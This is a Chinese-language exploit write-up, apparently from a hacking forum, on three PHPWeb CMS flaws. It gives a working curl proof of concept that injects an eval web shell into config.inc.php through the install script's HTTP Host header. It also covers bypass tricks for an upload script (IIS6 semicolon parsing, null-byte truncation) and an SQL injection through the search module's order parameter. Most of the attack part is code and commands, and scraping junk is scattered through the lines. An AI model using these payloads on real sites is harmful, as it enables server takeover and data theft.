phpweb成品网站最新版(注入、上传、写shell)

admin

注入：

8 b! n! ?. S, v7 h: F3 `之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码

鸡肋1： 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
鸡肋2： 有一定安全常识的站长都会删掉 install 目录

虽然鸡肋 但也有优点 ： 不受 magic_quotes_gpc 、 webserver 影响

分析：

& F4 P0 ~, D3 `# H) V
$siteurl="http://".$_SERVER["HTTP_HOST"]."/";    //未过滤

0 s+ y- f; H, ?7 z- \1 s% u1 {0 p                                            $filestr = fread(fopen($SysConfigFile, 'r'),30000);
6 m4 ?; i  E+ z                                            $filestr=str_replace(" ","",$filestr);
                                            $filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
                                            $filestr=str_replace("DefaultDbName",$dbname,$filestr);
$ z7 q& W( e. C. L! f                                            $filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
+ _$ V3 ^5 @, ^& {9 W" a                                            $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
4 Y$ B2 W  ^) J4 g3 [: m. v" u                                            $filestr=str_replace("DefaultsLan","zh_cn",$filestr);
                                            $filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
                                            $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);

/ d3 L7 X- f# V/ {. \, l  s                                            fwrite(fopen($ConFile,"w"),$filestr,30000);
: I  M9 D* i5 c1 ?  {$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^
8 c: h, E" J  V) w3 \
6 B, Y: A$ g  W1 p+ H& J+ e' Kpoc：
- m" x( p% P" U$ L6 c! T. D; \( P! k
?
( x5 ^/ z$ `# h1
curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
5 n' C: H. c. j* \" k" w) \4 Wshell地址: /config.inc.php
2 Y  G) _7 V9 D) |: k: |: L8 P7 _$ b跟之前的 phpcms一样 需要远程数据库

& B! L  J, n0 x$ ]+ s2 u——————————————————–
上传漏洞(需要进后台)：
漏洞文件: /kedit/upload_cgi/upload.php
这个很多人都知道,但是很鸡肋 iis6 解析 或 GPC off条件下才可利用
  |" v: I& W( n2 N6 g- B( Q: i

<?php
) `4 E7 r4 T# U7 d' ~2 o0 |: f    define("ROOTPATH", "../../");
    include(ROOTPATH."includes/admin.inc.php");
    NeedAuth(0);

    $dt=date("Ymd",time());
    if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
2 W% f/ t- P( R2 }; i1 n' g            @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
    }

    //文件保存目录路径
; b+ V6 Q7 B1 _3 I$ s$ \4 r    $save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
" m! j9 ~2 X  X  L, A    echo $save_path;
    //文件保存目录URL
) i7 @' g4 G  S8 w* J! b4 T    $save_url = '../../'.$_POST['attachPath'].$dt.'/';

    //定义允许上传的文件扩展名
    $ext_arr = array('gif','jpg','png','bmp'); //限制后缀
9 ?! Z# ^  D) S: {1 A5 M/ A: O
    //最大文件大小
    $max_size = 1000000;
( Y& q8 Y, a& G+ V* S% I/ X
    //更改目录权限
    @mkdir($save_path, 0777);

. }( G( J: k; _    //文件的全部路径
    $file_path = $save_path.$_POST['fileName'];   //保存文件名

8 A' s. m/ h, K* G8 S( j    //文件URL
4 |/ j+ Z$ t9 [. [* L3 g    $file_url = $save_url.$_POST['fileName'];
# \- t% E+ \3 j$ |3 l8 y$ ?! \//有上传文件时
. H8 f& d. x  k  q: w! k0 O1 A2 O- ]4 g( p    if (empty($_FILES) === false) {

            //原文件名
            $file_name = $_FILES['fileData']['name'];
            //服务器上临时文件名
            $tmp_name = $_FILES['fileData']['tmp_name'];
  L& {0 f2 d6 P( u' r            //文件大小
7 x( S  v0 g3 n4 b) {; G            $file_size = $_FILES['fileData']['size'];
            //检查目录
) ]- B' S0 J* d/ p$ e; ~. c( Y            if (@is_dir($save_path) === false) {
                    alert("上传目录不存在。");
            }
            //检查目录写权限
            if (@is_writable($save_path) === false) {
' n! [1 ?. b) n4 ]1 d* H                    alert("上传目录没有写权限。");
- ]6 }) p% {4 @2 s; c            }
: }# q/ V2 }3 A5 ]3 C            //检查是否已上传
6 G( m2 l( N8 E3 A% Y# h# Y, X            if (@is_uploaded_file($tmp_name) === false) {
                    alert("临时文件可能不是上传文件。");
0 q% l+ @) ]1 W6 o            }
            //检查文件大小
            if ($file_size > $max_size) {
                    alert("上传文件大小超过限制。");
            }
            //获得文件扩展名
# A3 T2 }5 \% W: w8 v7 d/ _/ k2 J            $temp_arr = explode(".", $_POST['fileName']);
            $file_ext = array_pop($temp_arr);
2 {& t7 D1 L' ?5 }$ ^            $file_ext = trim($file_ext);
2 d# H! v; J1 T# H8 W8 }            $file_ext = strtolower($file_ext);
6 T1 `9 F- d3 t/ `' _5 z
/ {+ D: @, w2 }1 ?            //检查扩展名   
* ~, \8 E1 e- E) J2 r            if (in_array($file_ext, $ext_arr) === false) {     
, E. Z* B8 G7 q, `                    alert("上传文件扩展名是不允许的扩展名。");
            }

) e. t# m$ f  f! ~7 T            //移动文件   
, a/ b1 R( r: Y0 `            //未重命名 虽然过滤了 后缀   iis 6解析漏洞 ^ _ ^
            if (move_uploaded_file($tmp_name, $file_path) === false) {
- k$ R3 s% G  ^) L3 ~: U                    alert("上传文件失败。");
            }

' ~( [) `6 v' ?5 v            @chmod($file_path,0666);

  _! t, A7 v; t) |    ?>
9 N- L8 [2 k. e( X抓包改包 filename 改为 xx.php;111.jpg 即可突破或者使用http://www.0day5.com/?p=227

apache 版本magic_quotes_gpc = off情况下可以考虑 \00 截断 绕过
7 U: R) c/ Z; S7 u6 P
——————————————————
1 t# m1 q* D" r5 X注入漏洞：
' n* }" s9 K# A0 A8 _+ ]漏洞文件:search/module/search.php
/search/index.php?key=1&myord=1 [sqlinjection]
, f: U* n! K$ }  t$ D; M

. ~0 }; i* p, r1 R<?php
6 _; b: x0 d! M1 U% \; }. [   //       ... 省略 n 行...
   //第18行:
9 A/ w" R7 U# z# b) i) Z9 a0 T# D. E           $key=htmlspecialchars($_GET["key"]);   //只是简单的将字符HTML 实体 编码   , mysql 注入不受此影响
           $page=htmlspecialchars($_GET["page"]);
4 H: l0 J# @" W6 x$ e           $myord=htmlspecialchars($_GET["myord"]);

   //       ... 省略 n 行...
   $key,$myord 两个参数带入查询
   //第47行 $key:

   $fsql->query("select count(id) from {P}_news_con where iffb='1' and catid!='0' and (title regexp '$key' or body regexp '$key')");  //虽然带入查询 但使用的 是regexp 不知如何绕过..

* \& y2 T& _) V% ?- W0 \   //第197行 $myord
   $fsql->query($scl . " order by $myord desc limit $pagelimit ");    产生注入

   ?>
6 G# t( _) r  |, p